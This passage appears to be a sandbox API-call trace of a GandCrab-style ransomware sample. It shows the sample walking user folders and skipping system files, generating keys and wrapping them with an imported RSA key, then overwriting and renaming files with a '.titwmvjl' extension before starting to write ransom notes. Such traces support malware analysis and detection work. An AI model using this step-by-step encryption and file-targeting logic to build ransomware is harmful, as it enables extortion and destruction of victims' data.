(lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="ntldr") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0096.655] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0096.656] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms") returned 109 [0096.656] lstrlenW (lpString=".regtrans-ms") returned 12 [0096.656] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.656] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0096.656] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.656] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.656] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0096.656] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.657] ReadFile (in: hFile=0x230, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0096.658] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.658] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.658] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.658] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.659] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.659] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0096.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.659] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.659] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.659] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.659] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.659] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.660] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.660] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.660] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0096.660] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.660] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.660] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.660] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.660] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.660] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.661] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503838) returned 1 [0096.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.661] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.661] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.661] GetLastError () returned 0x0 [0096.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.661] CryptDestroyKey (hKey=0x503838) returned 1 [0096.661] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.661] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.662] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.662] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503838) returned 1 [0096.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.662] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.662] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.663] GetLastError () returned 0x0 [0096.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.663] CryptDestroyKey (hKey=0x503838) returned 1 [0096.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.663] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.663] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.663] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.663] ReadFile (in: hFile=0x230, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f704*=0x80000, lpOverlapped=0x0) returned 1 [0096.685] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.685] WriteFile (in: hFile=0x230, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f6e8*=0x80000, lpOverlapped=0x0) returned 1 [0096.688] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.688] WriteFile (in: hFile=0x230, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0096.690] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.694] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.695] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.696] CloseHandle (hObject=0x230) returned 1 [0096.696] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms.titwmvjl" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000001.regtrans-ms.titwmvjl"), dwFlags=0x1) returned 1 [0096.697] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.697] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.697] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0096.697] lstrcmpW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0096.697] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" [0096.697] lstrlenW (lpString=".titwmvjl") returned 9 [0096.697] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0096.697] VirtualAlloc (lpAddress=0x0, dwSize=0x11a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.697] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.titwmvjl") returned 118 [0096.697] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0096.697] lstrlenW (lpString=".regtrans-ms") returned 12 [0096.697] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.697] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".regtrans-ms ") returned 13 [0096.698] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".titwmvjl") returned -1 [0096.698] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.698] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0096.698] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0096.698] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="desktop.ini") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="autorun.inf") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="iconcache.db") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="bootsect.bak") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="boot.ini") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat.log") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="thumbs.db") returned -1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.html") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="CRAB-DECRYPT.html") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntldr") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="NTDETECT.COM") returned 1 [0096.699] lstrcmpiW (lpString1="NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms", lpString2="Bootfont.bin") returned 1 [0096.699] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0096.699] lstrlenW (lpString=".regtrans-ms") returned 12 [0096.699] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.699] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".regtrans-ms ") returned 13 [0096.699] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.699] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.700] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0096.700] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.700] ReadFile (in: hFile=0x230, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0096.711] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.712] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.712] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.712] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.712] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.712] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.713] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0096.713] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.713] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.713] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.713] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.713] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.713] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.715] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.715] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.715] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0096.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.715] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.715] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.716] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.716] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x5034f8) returned 1 [0096.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.716] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.716] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.717] GetLastError () returned 0x0 [0096.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.717] CryptDestroyKey (hKey=0x5034f8) returned 1 [0096.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.717] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.717] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.718] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503638) returned 1 [0096.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.718] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.718] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.718] GetLastError () returned 0x0 [0096.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.718] CryptDestroyKey (hKey=0x503638) returned 1 [0096.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.718] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.719] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.719] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.719] ReadFile (in: hFile=0x230, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f704*=0x80000, lpOverlapped=0x0) returned 1 [0096.755] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.755] WriteFile (in: hFile=0x230, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f6e8*=0x80000, lpOverlapped=0x0) returned 1 [0096.883] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.883] WriteFile (in: hFile=0x230, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0096.886] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.889] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.891] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.891] CloseHandle (hObject=0x230) returned 1 [0096.892] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.titwmvjl" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms.titwmvjl"), dwFlags=0x1) returned 1 [0096.893] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.893] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.893] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0096.893] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0096.893] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0096.893] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0096.893] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.893] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.893] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.894] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.894] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.894] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.894] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.894] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.894] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.894] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Pictures\\\\TITWMVJL-DECRYPT.txt") returned 47 [0096.894] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.895] GetLastError () returned 0x50 [0096.895] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.895] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.895] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x2a, wMilliseconds=0xcf)) [0096.895] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.895] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.895] GetVolumeInformationW (in: lpRootPathName="C:\\", 